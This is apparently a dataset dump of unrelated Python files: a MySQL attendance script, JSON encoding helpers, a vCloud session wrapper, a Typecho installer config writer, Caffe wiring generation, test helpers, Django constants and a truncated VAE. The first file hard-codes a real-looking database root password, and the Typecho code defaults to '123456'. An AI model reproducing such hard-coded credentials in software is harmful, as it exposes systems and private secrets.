text stringlengths 38 1.54M |
|---|
import mysql.connector

# Connect to the local attendance database.
# NOTE(review): credentials are hard-coded here; move them to config/env
# before deploying.
mydb = mysql.connector.connect(
    host='localhost',
    user='root',
    password='Rithic@2002',
    database='attendance'
)
mycursor = mydb.cursor()
try:
    Name = input("Enter the name of the user")
    Present_or_absent = input("Enter the attendance of the user")
    Reg_No = input("Enter the registration number")
    # Parameterized query — values are bound by the driver, not interpolated,
    # so user input cannot inject SQL.
    sql = "INSERT INTO daily_record(Name,Status,Registration_Number) VALUES(%s,%s,%s)"
    val = (Name, Present_or_absent, Reg_No)
    mycursor.execute(sql, val)
    mydb.commit()
finally:
    # BUG FIX: the original never released the cursor or the connection.
    mycursor.close()
    mydb.close()
import copy
import dataclasses
from enum import Enum
import json
from interference.transformers.transformer_pipeline import Instance
from interference.scoring import ScoringCalculator
import numpy
# FIXME: Huge hack... From https://github.com/python/cpython/blob/6b1ac809b9718a369aea67b99077cdd682be2238/Lib/dataclasses.py#L1095
def _is_dataclass_instance(obj):
"""Returns True if obj is an instance of a dataclass."""
return hasattr(type(obj), '__dataclass_fields__')
def asdict(obj, *, dict_factory=dict):
    """Recursively convert a dataclass instance into a dictionary.

    Maps field names to field values; recurses into nested dataclasses and
    into the built-in containers (tuples, lists, dicts).  'dict_factory',
    when given, replaces the built-in dict for every produced mapping.

    Example:
        @dataclass
        class C:
            x: int
            y: int
        asdict(C(1, 2)) == {'x': 1, 'y': 2}
    """
    # Guard clause: only dataclass *instances* are accepted.
    if not _is_dataclass_instance(obj):
        raise TypeError("asdict() should be called on dataclass instances")
    return _asdict_inner(obj, dict_factory)
def _asdict_inner(obj, dict_factory):
    """Recursive worker for asdict().

    Unlike the stdlib version this was copied from, fields with repr=False
    are skipped when converting a dataclass (see the `if f.repr` check).
    """
    if _is_dataclass_instance(obj):
        result = []
        for f in dataclasses.fields(obj):
            # Only fields that participate in repr are serialized.
            if f.repr:
                value = _asdict_inner(getattr(obj, f.name), dict_factory)
                result.append((f.name, value))
        return dict_factory(result)
    elif isinstance(obj, tuple) and hasattr(obj, '_fields'):
        # obj is a namedtuple. Recurse into it, but the returned
        # object is another namedtuple of the same type. This is
        # similar to how other list- or tuple-derived classes are
        # treated (see below), but we just need to create them
        # differently because a namedtuple's __init__ needs to be
        # called differently (see bpo-34363).
        # I'm not using namedtuple's _asdict()
        # method, because:
        # - it does not recurse in to the namedtuple fields and
        # convert them to dicts (using dict_factory).
        # - I don't actually want to return a dict here. The main
        # use case here is json.dumps, and it handles converting
        # namedtuples to lists. Admittedly we're losing some
        # information here when we produce a json list instead of a
        # dict. Note that if we returned dicts here instead of
        # namedtuples, we could no longer call asdict() on a data
        # structure where a namedtuple was used as a dict key.
        return type(obj)(*[_asdict_inner(v, dict_factory) for v in obj])
    elif isinstance(obj, (list, tuple)):
        # Assume we can create an object of this type by passing in a
        # generator (which is not true for namedtuples, handled
        # above).
        return type(obj)(_asdict_inner(v, dict_factory) for v in obj)
    elif isinstance(obj, dict):
        # Keys are converted too, so dataclass keys become dicts (unhashable);
        # matches the stdlib behavior this was copied from.
        return type(obj)((_asdict_inner(k, dict_factory),
                          _asdict_inner(v, dict_factory))
                         for k, v in obj.items())
    else:
        # Leaf value: deep-copy so the caller's structure shares nothing
        # with the original object graph.
        return copy.deepcopy(obj)
# FIXME: Hack over...
class EnhancedJSONEncoder(json.JSONEncoder):
    """JSON encoder that also handles dataclasses, Enums, numpy values,
    and ScoringCalculator instances."""

    def default(self, o):
        """Serialize objects the stock JSONEncoder cannot handle."""
        if dataclasses.is_dataclass(o):
            return asdict(o)
        if isinstance(o, Enum):
            return o.name
        if type(o).__module__ == numpy.__name__:
            # numpy array -> nested lists; numpy scalar -> Python scalar.
            return o.tolist() if isinstance(o, numpy.ndarray) else o.item()
        if isinstance(o, ScoringCalculator):
            return o.describe()
        return super().default(o)
# VMware vCloud Python helper
# Copyright (c) 2014 Huawei, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at #
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from nova import exception
from nova.i18n import _LW
from oslo_concurrency import lockutils
from oslo_log import log as logging
from oslo_service import loopingcall
from pyvcloud.vcloudair import VCA
from threading import Lock
LOG = logging.getLogger(__name__)
class VCloudAPISession(object):
    """Sets up a session with the vcloud and handles all
    the calls made to the vcloud.
    """

    def __init__(self, host_ip, host_port, server_username, server_password,
                 org, vdc, version, verify, service_type,
                 retry_count, create_session=True, scheme="https",
                 task_poll_interval=1):
        """Store connection parameters and optionally log in immediately.

        :param create_session: when True, establish the session now.
        """
        self._host_ip = host_ip
        self._server_username = server_username
        self._server_password = server_password
        self._org = org
        self._vdc = vdc
        self._version = version
        self._verify = verify
        self._service_type = service_type
        self._retry_count = retry_count
        self._scheme = scheme
        self._host_port = host_port
        self._session_username = None
        self._session_id = None
        self._vca = None  # lazily built by the `vca` property
        self._task_poll_interval = task_poll_interval
        self._auto_lock = Lock()
        if create_session:
            self._create_session()

    @lockutils.synchronized('hypernode-plug-unplug')
    def _create_session(self):
        """Establish session with the server."""
        if self._session_id and self.is_current_session_active():
            LOG.debug("Current session: %s is active.",
                      self._session_id)
            return
        # Login and create new session with the server for making API calls.
        LOG.debug("Logging in with username = %s.", self._server_username)
        result = self.vca.login(password=self._server_password, org=self._org)
        if not result:
            raise exception.NovaException(
                "Logging error with username:%s " % self._server_username)
        # Second login with the token binds the session to the org URL.
        result = self.vca.login(
            token=self.vca.token,
            org=self._org,
            org_url=self.vca.vcloud_session.org_url)
        if not result:
            raise exception.NovaException(
                "Logging error with username:%s with token " %
                self._server_username)
        self._session_id = self.vca.token
        # We need to save the username in the session since we may need it
        # later to check active session. The SessionIsActive method requires
        # the username parameter to be exactly same as that in the session
        # object. We can't use the username used for login since the Login
        # method ignores the case.
        self._session_username = self.vca.username
        LOG.info("Successfully established new session; session ID is %s.",
                 self._session_id)

    def is_current_session_active(self):
        """Check if current session is active.
        :returns: True if the session is active; False otherwise
        """
        LOG.debug("Checking if the current session: %s is active.",
                  self._session_id)
        is_active = False
        try:
            is_active = self.vca.session_is_active()
        except Exception:
            LOG.error("Check session is active error %s." % self._session_id,
                      exc_info=True)
        return is_active

    def invoke_api(self, module, method, *args, **kwargs):
        """Wrapper method for invoking APIs.
        The API call is retried in the event of exceptions due to session
        overload or connection problems.
        :param module: module corresponding to the VCA API call
        :param method: method in the module which corresponds to the
                       VCA API call
        :param args: arguments to the method
        :param kwargs: keyword arguments to the method
        :returns: response from the API call
        :raises: VCloudDriverException
        """
        @loopingcall.RetryDecorator(max_retry_count=self._retry_count)
        def _invoke_api(module, method, *args, **kwargs):
            try:
                api_method = getattr(module, method)
                return api_method(*args, **kwargs)
            # BUG FIX: the original wrote `except exception as excep`, which
            # names the imported nova `exception` *module*, not an exception
            # class — catching it raises TypeError at runtime.
            except Exception as excep:
                # If this is due to an inactive session, we should re-create
                # the session and retry.
                if self.is_current_session_active():
                    excep_msg = "VCloud connect error while invoking method "\
                                "%s.%s." % (module, method)
                    LOG.error(excep_msg, exc_info=True)
                    raise exception.NovaException(excep_msg)
                else:
                    # LOG.warn is deprecated in favor of LOG.warning.
                    LOG.warning(_LW("Re-creating session due to connection "
                                    "problems while invoking method "
                                    "%(module)s.%(method)s."),
                                {'module': module,
                                 'method': method},
                                exc_info=True)
                    self._create_session()
                    raise excep
        return _invoke_api(module, method, *args, **kwargs)

    @property
    def vca(self):
        """Lazily-constructed pyvcloud VCA client."""
        if not self._vca:
            self._vca = VCA(host=self._host_ip, username=self._server_username,
                            service_type=self._service_type,
                            version=self._version,
                            verify=self._verify)
        return self._vca

    @property
    def vdc(self):
        """Virtual data center name."""
        return self._vdc

    @property
    def username(self):
        """Login username (as configured, not the session-cased one)."""
        return self._server_username

    @property
    def password(self):
        """Login password."""
        return self._server_password

    @property
    def host_ip(self):
        """vCloud host IP address."""
        return self._host_ip

    @property
    def host_port(self):
        """vCloud host port."""
        return self._host_port

    @property
    def org(self):
        """vCloud organization name."""
        return self._org
|
import requests
import time
header = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0'}
class imformation():
    """Holds the Typecho installer form fields and writes config.inc.php.

    NOTE(review): class name 'imformation' (sic) is kept for backward
    compatibility with existing callers.
    """

    def __init__(self, dbhost, userurl, userpassword, dbpassword, username, usermail):
        self._dbhost = dbhost
        # Fall back to the default DB password when none is supplied.
        if dbpassword == '':
            self._dbpassword = '123456'
        else:
            self._dbpassword = dbpassword
        self._userurl = userurl
        self._username = username
        self._userpassword = userpassword
        self._usermail = usermail
        # POST payload for install.php?config.
        # BUG FIX: 'dbCharset' was listed twice in the original literal;
        # the duplicate (identical) entry has been removed.
        self._dict = {
            'dbAdapter': 'Pdo_Mysql',
            'dbHost': '',
            'dbPort': '3306',
            'dbUser': 'root',
            'dbPassword': '',
            'dbDatabase': 'typecho',
            'dbCharset': 'utf8',
            'dbEngine': 'MyISAM',
            'dbPrefix': 'typecho_',
            'userUrl': '',
            'userName': '',
            'userPassword': '',
            'userMail': '',
            'action': 'config'}

    def update(self):
        """Copy the instance fields into the POST payload dict."""
        self._dict["dbHost"] = self._dbhost
        self._dict['dbPassword'] = self._dbpassword
        self._dict['userUrl'] = "http://" + self._userurl
        self._dict['userMail'] = self._usermail
        self._dict['userName'] = self._username
        self._dict['userPassword'] = self._userpassword

    def write_conf(self):
        """Render typecho/config.inc.php from a template with this host/password."""
        configphp = """<?php
/**
 * Typecho Blog Platform
 *
 * @copyright Copyright (c) 2008 Typecho team (http://www.typecho.org)
 * @license GNU General Public License 2.0
 * @version $Id$
 */
/** 定义根目录 */
define('__TYPECHO_ROOT_DIR__', dirname(__FILE__));
/** 定义插件目录(相对路径) */
define('__TYPECHO_PLUGIN_DIR__', '/usr/plugins');
/** 定义模板目录(相对路径) */
define('__TYPECHO_THEME_DIR__', '/usr/themes');
/** 后台路径(相对路径) */
define('__TYPECHO_ADMIN_DIR__', '/admin/');
/** 设置包含路径 */
@set_include_path(get_include_path() . PATH_SEPARATOR .
__TYPECHO_ROOT_DIR__ . '/var' . PATH_SEPARATOR .
__TYPECHO_ROOT_DIR__ . __TYPECHO_PLUGIN_DIR__);
/** 载入API支持 */
require_once 'Typecho/Common.php';
/** 程序初始化 */
Typecho_Common::init();
/** 定义数据库参数 */
$db = new Typecho_Db('Pdo_Mysql', 'typecho_');
$db->addServer(array (
'host' => '192.168.64.2',
'user' => 'root',
'password' => '123456',
'charset' => 'utf8',
'port' => '3306',
'database' => 'typecho',
'engine' => 'MyISAM',
), Typecho_Db::READ | Typecho_Db::WRITE);
Typecho_Db::set($db);
"""
        # Substitute the placeholder host and password baked into the template.
        # NOTE(review): str.replace hits every occurrence; currently the
        # placeholders only appear in the DB server block.
        configphp = configphp.replace('192.168.64.2', self._dbhost)
        configphp = configphp.replace('123456', self._dbpassword)
        with open("typecho/config.inc.php", 'w') as f:
            f.write(configphp)
import caffe
import numpy as np
import argparse
import os
import sys
def find_in_bottom(net, id, start):
    """Index of the first layer after *start* whose bottom blobs contain *id*, else -1."""
    for i in range(start + 1, len(net.layers)):
        if id in net._bottom_ids(i):
            return i
    return -1
def find_in_top(net, id, start):
    """Index of the nearest layer before *start* whose top blobs contain *id*, else -1."""
    for i in range(start - 1, -1, -1):
        if id in net._top_ids(i):
            return i
    return -1
def print_top_wire(f, net, i):
    """Emit SystemC wiring for layer i's top-blob 'empty' signals into *f*."""
    layer = net._layer_names[i]
    top_ids = net._top_ids(i)
    if len(top_ids) == 0:
        # No tops at all: tie the empty flag high.
        f.write("%s.top_blob_empty.write(true);\n" % (layer))
        return
    if len(top_ids) == 1:
        consumer = find_in_bottom(net, top_ids[0], i)
        if consumer >= 0:
            f.write("%s.top_blob_empty(%s.bottom_blob_empty);\n"
                    % (layer, net._layer_names[consumer]))
        else:
            # No downstream consumer: this top is a network output.
            f.write("%s.top_blob_empty(output_empty);\n" % (layer))
        return
    # Several tops: AND their consumers' empty flags together.
    f.write("%s_top_and.clk(clk);\n" % (layer))
    f.write("%s_top_and.reset(reset);\n" % (layer))
    for j, blob_id in enumerate(top_ids):
        consumer = find_in_bottom(net, blob_id, i)
        if consumer >= 0:
            f.write("%s_top_and.in[%d](%s.bottom_blob_empty);\n"
                    % (layer, j, net._layer_names[consumer]))
        else:
            f.write("%s_top_and.in[%d](output_empty);\n" % (layer, j))
    f.write("%s.top_blob_empty(%s_top_and.out);\n" % (layer, layer))
def print_bottom_wire(f, net, i):
    """Emit SystemC wiring for layer i's bottom-blob 'filled' signals into *f*."""
    layer = net._layer_names[i]
    bottom_ids = net._bottom_ids(i)
    if len(bottom_ids) == 0:
        # No bottoms: the layer is fed directly by the network input.
        f.write("%s.bottom_blob_filled(input_filled);\n" % (layer))
        return
    if len(bottom_ids) == 1:
        producer = find_in_top(net, bottom_ids[0], i)
        if producer >= 0:
            f.write("%s.bottom_blob_filled(%s.top_blob_filled);\n"
                    % (layer, net._layer_names[producer]))
        else:
            f.write("%s.bottom_blob_filled(input_filled);\n" % (layer))
        return
    # Several bottoms: AND the producers' filled flags together.
    # NOTE(review): unlike print_top_wire, the clk/reset hookups for the AND
    # gate were commented out in the original — intentionally not emitted.
    for j, blob_id in enumerate(bottom_ids):
        producer = find_in_top(net, blob_id, i)
        if producer >= 0:
            f.write("%s_bottom_and.in[%d](%s.top_blob_filled);\n"
                    % (layer, j, net._layer_names[producer]))
        else:
            f.write("%s_bottom_and.in[%d](input_filled);\n" % (layer, j))
    f.write("%s.bottom_blob_filled(%s_bottom_and.out);\n" % (layer, layer))
# Generate gen/net_wire.cpp: SystemC wiring for every layer of a caffe net.
if len(sys.argv) < 3:
    sys.exit(0)

model = sys.argv[1]
weights = sys.argv[2]
print(model)
print(weights)

net = caffe.Net(model, caffe.TEST)
net.copy_from(weights)


def _unique_producer_layers(net, blob_ids):
    """Return the unique layer indexes whose top produces each blob in *blob_ids*.

    BUG FIX: the original used `raise(0)` here, which itself fails with
    'exceptions must derive from BaseException'; raise a real error instead.
    """
    layers = []
    for blob_id in blob_ids:
        l = find_in_top(net, blob_id, len(net._layer_names))
        if l < 0:
            raise RuntimeError("no layer found for blob id %s" % blob_id)
        if l not in layers:
            layers.append(l)
    if len(layers) < 1:
        raise RuntimeError("empty blob id list")
    return layers


with open("gen/net_wire.cpp", "w") as f:
    f.write('\n#include "sc_net.h"\nvoid sc_net::setup_wires()\n{\n')

    # Per-layer clock/reset plus top/bottom handshake wiring.
    for i in range(len(net.layers)):
        name = net._layer_names[i]
        f.write("%s.clk(clk);\n" % (name))
        f.write("%s.reset(reset);\n" % (name))
        print_top_wire(f, net, i)
        print_bottom_wire(f, net, i)

    # Wire the network inputs.
    # NOTE(review): inputs are located with find_in_top (same as outputs) but
    # wired to bottom_blob_empty — looks asymmetric; preserved as-is, confirm.
    s = _unique_producer_layers(net, net._inputs)
    if len(s) > 1:
        for i, layer_idx in enumerate(s):
            name = net._layer_names[layer_idx]
            f.write("input_and.in[%d](%s.bottom_blob_empty);\n" % (i, name))
        f.write("input_empty(input_and.out);\n")
    else:
        name = net._layer_names[s[0]]
        f.write("input_empty(%s.bottom_blob_empty);\n" % (name))

    # Wire the network outputs.
    s = _unique_producer_layers(net, net._outputs)
    if len(s) > 1:
        for i, layer_idx in enumerate(s):
            name = net._layer_names[layer_idx]
            f.write("output_and.in[%d](%s.top_blob_filled);\n" % (i, name))
        f.write("output_filled(output_and.out);\n")
    else:
        name = net._layer_names[s[0]]
        f.write("output_filled(%s.top_blob_filled);\n" % (name))

    f.write("\n}")
    # Redundant f.close() removed: the `with` block already closes the file.
|
#!/usr/bin/python
#-*- coding:utf-8 -*-
#Quick python script explanation for programmers
#给程序员的脚本解说
#导入模块
import os,sys
def main():
    """Demo of basic Python syntax for newcomers (strings, loops, formatting)."""
    # Single-line strings take single or double quotes; escape an embedded
    # quote with \'
    print( 'hello world!')
    print( '这是Bob\'的问候')
    foo(5,10)
    # Strings support multiplication: '=' * 10 -> '=========='
    print ('=' * 10)
    print ('这将直接执行' + 'hello world')
    count = 0
    count += 1
    food=['红','黄','蓝','紫','黑']
    # Iterate a list of color names and print each one.
    for i in food:
        print ('我喜欢'+i+'色')
    print( '数到10')
    # Count from 1 to 10 using %-formatting.
    for i in range(10):
        print('%d'%(i+1))
def foo(i, j):
    """Print the sum of i and j plus a category marker, and return the sum."""
    total = i + j
    print('%s加%s等于%s' % (i, j, total))
    if total < 10:
        print('aaaaaaaaaa')
    elif total >= 10 and i == 1:
        print('bbbbbbbbbb')
    else:
        print('cccccccccc')
    return total
# Run main() only when this file is executed as a script (not when imported).
if __name__=='__main__':
    main()
|
if __name__ == '__main__':
    # For each of t test cases: read the (declared) array size, the array
    # itself, and a target k; print the index of k's first occurrence or -1.
    t = int(input())
    while t > 0:
        n = int(input())  # declared size; the parsed list defines the real length
        arr = list(map(int, input().strip().split()))
        k = int(input())
        try:
            print(arr.index(k))
        # BUG FIX: was a bare `except:` (swallows even KeyboardInterrupt);
        # list.index raises ValueError when the element is absent.
        except ValueError:
            print(-1)
        t -= 1
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import numpy as np
import random
import tqdm_utils
def test_vocab(vocab, PAD, UNK, START, END):
return [
len(vocab),
len(np.unique(list(vocab.values()))),
int(all([_ in vocab for _ in [PAD, UNK, START, END]]))
]
def test_captions_indexing(train_captions_indexed, vocab, UNK):
starts = set()
ends = set()
between = set()
unk_count = 0
for caps in train_captions_indexed:
for cap in caps:
starts.add(cap[0])
between.update(cap[1:-1])
ends.add(cap[-1])
for w in cap:
if w == vocab[UNK]:
unk_count += 1
return [
len(starts),
len(ends),
len(between),
len(between | starts | ends),
int(all([isinstance(x, int) for x in (between | starts | ends)])),
unk_count
]
def test_captions_batching(batch_captions_to_matrix):
return (batch_captions_to_matrix([[1, 2, 3], [4, 5]], -1, max_len=None).ravel().tolist()
+ batch_captions_to_matrix([[1, 2, 3], [4, 5]], -1, max_len=2).ravel().tolist()
+ batch_captions_to_matrix([[1, 2, 3], [4, 5]], -1, max_len=10).ravel().tolist())
def get_feed_dict_for_testing(decoder, IMG_EMBED_SIZE, vocab):
    """Random feed dict: a batch of 32 fake image embeddings and 32 sentences of length 20."""
    image_batch = np.random.random((32, IMG_EMBED_SIZE))
    sentence_batch = np.random.randint(0, len(vocab), (32, 20))
    return {
        decoder.img_embeds: image_batch,
        decoder.sentences: sentence_batch
    }
def test_decoder_shapes(decoder, IMG_EMBED_SIZE, vocab, s):
    """Run each decoder tensor once and return all result shapes flattened."""
    tensors = (
        decoder.h0,
        decoder.word_embeds,
        decoder.flat_hidden_states,
        decoder.flat_token_logits,
        decoder.flat_ground_truth,
        decoder.flat_loss_mask,
        decoder.loss,
    )
    all_shapes = []
    for tensor in tensors:
        out = s.run(tensor, feed_dict=get_feed_dict_for_testing(decoder, IMG_EMBED_SIZE, vocab))
        all_shapes.extend(out.shape)
    return all_shapes
def test_random_decoder_loss(decoder, IMG_EMBED_SIZE, vocab, s):
    """Evaluate the decoder loss once on a random feed dict."""
    feed = get_feed_dict_for_testing(decoder, IMG_EMBED_SIZE, vocab)
    return s.run(decoder.loss, feed_dict=feed)
def test_validation_loss(decoder, s, generate_batch, val_img_embeds, val_captions_indexed):
    """Average decoder loss over a fixed number of validation batches (seeded for repeatability)."""
    np.random.seed(300)
    random.seed(300)
    val_loss = 0
    batches_for_eval = 1000
    for _ in tqdm_utils.tqdm_notebook_failsafe(range(batches_for_eval)):
        val_loss += s.run(decoder.loss, generate_batch(val_img_embeds,
                                                       val_captions_indexed,
                                                       32,
                                                       20))
    # CONSISTENCY FIX: divide by the batch-count variable instead of a
    # hard-coded 1000. so the two can never drift apart.
    val_loss /= float(batches_for_eval)
    return val_loss
|
"""
Mixing Peer State and RPC Interface
"""
import asyncio
import aiozmq.rpc
class MixingPeer(aiozmq.rpc.AttrHandler):
    """Peer state plus the RPC interface for one mixing participant.

    BUG FIX: the module is imported as `import aiozmq.rpc`, so the bare name
    `rpc` used by the original (base class and decorators) was undefined.
    """

    def __init__(self):
        self.addr = None
        # hash of public key? easier to use than index which needs to be
        # assigned and reassigned
        self.peer_id = None
        self.n_input_peers = 0
        self.input_peers = []
        self.n_mixing_peers = 0
        self.mixing_peers = []
        self.keypair = None

    async def committment(self):
        """Commitment round: generate shares, broadcast them, wait for peers."""
        shares = self.c2_generate_random_shares()
        # BUG FIX: the original passed `self` explicitly to a bound method,
        # duplicating the first argument.
        await self.c3_broadcast_public_shares(shares)
        # NOTE(review): wait_for_peer_shares is not defined in this class —
        # confirm it is provided elsewhere.
        self.wait_for_peer_shares()

    def c2_generate_random_shares(self):
        """One random share per input peer."""
        # BUG FIX: `input_peers` was read as a bare (undefined) name.
        # NOTE(review): generate_share is not defined in this module — confirm import.
        shares = [generate_share() for _ in self.input_peers]
        return shares

    async def c3_broadcast_public_shares(self, shares):
        """Push the public shares to every mixing peer concurrently."""
        coros = [mixing_peer.rpc.call.c3_push_public_shares(shares)
                 for mixing_peer in self.mixing_peers]
        results = await asyncio.gather(*coros, return_exceptions=True)
        for res in results:
            # TODO: validate that peers received the shares
            pass

    @aiozmq.rpc.method
    def request_start(self):
        pass

    @aiozmq.rpc.method
    def c3_push_public_shares(self, shares):
        pass
class RemoteMixingPeer:
    """Client-side handle for a remote mixing peer."""

    def __init__(self, connection=None):
        """Optionally bind an established connection; new optional parameter
        is backward-compatible with the original zero-arg constructor."""
        self.addr = None
        self.public_key = None
        self.connection = connection
        # BUG FIX: the original read the bare name `connection` (NameError on
        # every construction). Derive the RPC proxy only when a connection exists.
        self.rpc = connection.rpc.call if connection is not None else None
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
from django.utils.translation import ugettext_lazy as _
# Minimum allowed account password length (characters).
MIN_PASSWORD_LEN = 6
VERIFY_CODE_EXPIRED_TIME = 5 * 60  # 5 minutes
# Temporary media files located next to this module.
TEMP_IMAGE = os.path.join(os.path.dirname(__file__), 'temp.jpg')
TEMP_VIDEO = os.path.join(os.path.dirname(__file__), 'temp.mp4')
# Footer filename suffixes per media category.
PROFILE_FOOTER_IMAGE = '_profile.jpg'
EVENT_FOOTER_IMAGE = '_event.jpg'
EVENT_FOOTER_VIDEO = '_event.mp4'
EVENT_FOOTER_VIDEO_THUMBNAIL = '_event_video_thumbnail.jpg'
FEEDBACK_FOOTER_IMAGE = '_feedback.jpg'
# Storage sub-directory per upload type.
DIR_EVENT_IMAGE = '/image/'
DIR_EVENT_VIDEO = '/video/'
DIR_USER_PROFILE = '/profile/'
DIR_FEEDBACK = '/feedback/'
# register & user
CODE_SUCCESS = 200
CODE_EMPTY_USER = 1201
CODE_EMPTY_BABY_NAME = 1202
CODE_EMPTY_EMAIL = 1203
CODE_EMPTY_PASSWORD = 1204
CODE_INVALID_EMAIL = 1205
CODE_INVALID_PASSWORD = 1206
CODE_DUPLICATE_USER = 1207
CODE_DUPLICATE_EMAIL = 1208
CODE_DUPLICATE_PHONE = 1209
CODE_NOT_EXISTS_EMAIL = 1210
CODE_NOT_ACTIVE = 1211
CODE_INCORRECT_USER_NAME_OR_PASSWORD = 1212
CODE_EMPTY_VERIFY_CODE = 1213
CODE_INCORRECT_VERIFY_CODE = 1214
CODE_EXPIRED_VERIFY_CODE = 1215
CODE_USER_NOT_EXISTS = 1216
# event
CODE_EMPTY_EVENT = 1301
TYPE_IMAGE = 0
TYPE_VIDEO = 1
# comment
CODE_EMPTY_COMMENT = 1401
DATE_TIME_FORMAT = ('%Y-%m-%d %H:%M:%S')
CODE_NO_CONTENT = 204
CODE_INVALID_REQUEST = 400
CODE_INVALID_TOKEN = 401
CODE_EXCEPTION = 402
CODE_DUPLICATE = 403
MSG_204 = _(u'请求数据不存在')
MSG_400 = _(u'请求数据格式不正确')
MSG_401 = _(u'AccessToken异常')
MSG_402 = _(u'接口发生异常')
MSG_403 = _(u'重复保存')
# register message
MSG_EMPTY_USERNAME = _(u'用户名不能为空')
MSG_EMPTY_BABY_NAME = _(u'宝宝名不能为空')
MSG_EMPTY_EMAIL = _(u'邮箱不能为空')
MSG_EMPTY_PASSWORD = _(u'密码不能为空')
MSG_INVALID_EMAIL = _(u'邮箱格式不正确')
MSG_NO_SUCH_EMAIL = _(u'此邮箱不存在')
MSG_INVALID_PASSWORD = _(u'密码不能少于6位')
MSG_DUPLICATE_USER = _(u'该用户已被使用')
MSG_DUPLICATE_EMAIL = _(u'该邮箱已被使用')
MSG_DUPLICATE_PHONE = _(u'该手机号码已被使用')
MSG_NOT_EXISTS_EMAIL = _(u'该邮箱不存在')
MSG_CREATE_USER_SUCCESS = _(u'用户创建成功')
MSG_GET_USERS_SUCCESS = _(u'获取用户成功')
MSG_LOGIN_SUCCESS = _(u'登入成功')
MSG_UPDATE_USER_INFO_SUCCESS = _(u'更新用户信息成功')
MSG_NOT_ACTIVE_USER = _(u'该用户暂时不可用')
MSG_INCORRECT_USER_NAME_OR_PASSWORD = _(u'用户名或账号错误')
MSG_SEND_VERIFY_CODE_SUCCESS = _(u'验证码发送成功')
MSG_EMPTY_VERIFY_CODE = _(u'验证码不能为空')
MSG_INCORRECT_VERIFY_CODE = _(u'验证码错误')
MSG_EXPIRED_VERIFY_CODE = _(u'验证码已过期')
MSG_USER_NOT_EXISTS = _(u'该用户不存在')
MSG_GET_EVENTS_SUCCESS = _(u'获取动态成功')
MSG_GET_COMMENTS_SUCCESS = _(u'获取评论成功')
MSG_SEND_FEEDBACK_SUCCESS = _(u'反馈消息发送成功')
MSG_GET_USER_DETAIL_SUCCESS = _(u'获取用户信息成功')
MSG_ADD_LIKE_SUCCESS = _(u'点赞成功')
PASSWORD_VERIFY_CODE_EMAIL_SUBJECT = _(u'忘记密码验证码-嘟嘟手记')
PASSWORD_VERIFY_CODE_EMAIL_CONTENT = _(u'您的验证码:%s。\n本邮件是系统自动发送的,请勿直接回复!感谢您的访问,祝您使用愉快!')
MSG_GET_APP_INFO_SUCCESS = _(u'获取应用版本信息')
# event message
MSG_EMPTY_EVENT = _(u'数据不能全为空')
MSG_POST_EVENT_SUCCESS = _(u'发布成功')
MSG_DELETE_EVENT_SUCCESS = _(u'删除动态成功')
MSG_DELETE_COMMENT_SUCCESS = _(u'删除评论成功')
# comment
MSG_EMPTY_COMMENT_FIELD = _(u'数据格式不正确')
MSG_POST_COMMENT_SUCCESS = _(u'评论发布成功')
# about us
MSG_NO_CONTENT = _(u'<h1 align="center">暂无内容</h1>')
# red envelopes
MSG_GET_RED_ENVELOPES_SUCCESS = _(u'获取红包列表成功')
MSG_DELETE_RED_ENVELOPE_SUCCESS = _(u'删除红包成功')
MSG_ADD_RED_ENVELOPE_SUCCESS = _(u'添加红包成功')
# iaer
MSG_GET_IAERS_SUCCESS = _(u'获取收支列表成功')
MSG_DELETE_IAER_SUCCESS = _(u'删除收支成功')
MSG_ADD_IAER_SUCCESS = _(u'添加收支成功')
|
# Variational autoencoder on MNIST (TF 1.x graph API): build encoder/decoder,
# restore a trained checkpoint, and show original/reconstruction pairs.
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
import tensorflow as tf
old_v = tf.logging.get_verbosity()
tf.logging.set_verbosity(tf.logging.ERROR)
import numpy as np
import matplotlib.pyplot as plt

# Directory holding the trained model checkpoint.
model_dir = os.path.join(os.getcwd(), "model")
if not os.path.exists(model_dir):
    os.makedirs(model_dir)

# dataset
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets('/tmp/data', one_hot=True)

n_pixels = 28 * 28
X = tf.placeholder(tf.float32, shape=([None, n_pixels]))


def weight_variables(shape, name):
    """Weight variable initialized from a truncated normal (stddev 0.1)."""
    initial = tf.truncated_normal(shape, stddev=0.1)
    return tf.Variable(initial, name=name)


def bias_variable(shape, name):
    """Bias variable initialized from a truncated normal (stddev 0.1)."""
    initial = tf.truncated_normal(shape, stddev=0.1)
    return tf.Variable(initial, name=name)


def FC_layer(x, w, b):
    """Fully-connected layer: x @ w + b."""
    return tf.matmul(x, w) + b


latent_dim = 20
h_dim = 500

# Encoder -----------------------------------------------------------------
W_enc = weight_variables([n_pixels, h_dim], 'W_enc')
b_enc = bias_variable([h_dim], 'b_enc')
h_enc = tf.nn.tanh(FC_layer(X, W_enc, b_enc))  # layer 1, tanh activation

W_mu = weight_variables([h_dim, latent_dim], 'W_mu')
b_mu = bias_variable([latent_dim], 'b_mu')
mu = FC_layer(h_enc, W_mu, b_mu)  # latent mean

W_logstd = weight_variables([h_dim, latent_dim], 'W_logstd')
b_logstd = bias_variable([latent_dim], 'b_logstd')
logstd = FC_layer(h_enc, W_logstd, b_logstd)  # latent log-std

# Reparameterization trick: z = mu + eps * exp(0.5 * logstd)
noise = tf.random_normal([1, latent_dim])
z = mu + tf.multiply(noise, tf.exp(.5 * logstd))

# Decoder -----------------------------------------------------------------
W_dec = weight_variables([latent_dim, h_dim], 'W_dec')
b_dec = bias_variable([h_dim], 'b_dec')
h_dec = tf.nn.tanh(FC_layer(z, W_dec, b_dec))

W_reconstruct = weight_variables([h_dim, n_pixels], 'W_reconstruct')
b_reconstruct = bias_variable([n_pixels], 'b_reconstruct')
reconstruction = tf.nn.sigmoid(FC_layer(h_dec, W_reconstruct, b_reconstruct))

# Loss: Bernoulli log-likelihood plus KL divergence to the unit Gaussian.
log_likelihood = tf.reduce_sum(
